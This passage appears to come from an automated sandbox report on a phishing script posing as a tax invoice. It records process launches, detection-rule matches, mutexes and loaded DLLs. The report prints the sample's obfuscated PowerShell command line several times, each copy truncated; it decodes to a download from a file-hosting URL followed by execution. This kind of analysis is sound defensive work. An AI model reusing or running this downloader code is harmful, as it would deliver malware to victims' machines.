Source: unknown	Process created: Commandline size = 7485
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7485	Jump to behavior

Source: amsi32_1812.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1788, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1812, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1812

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
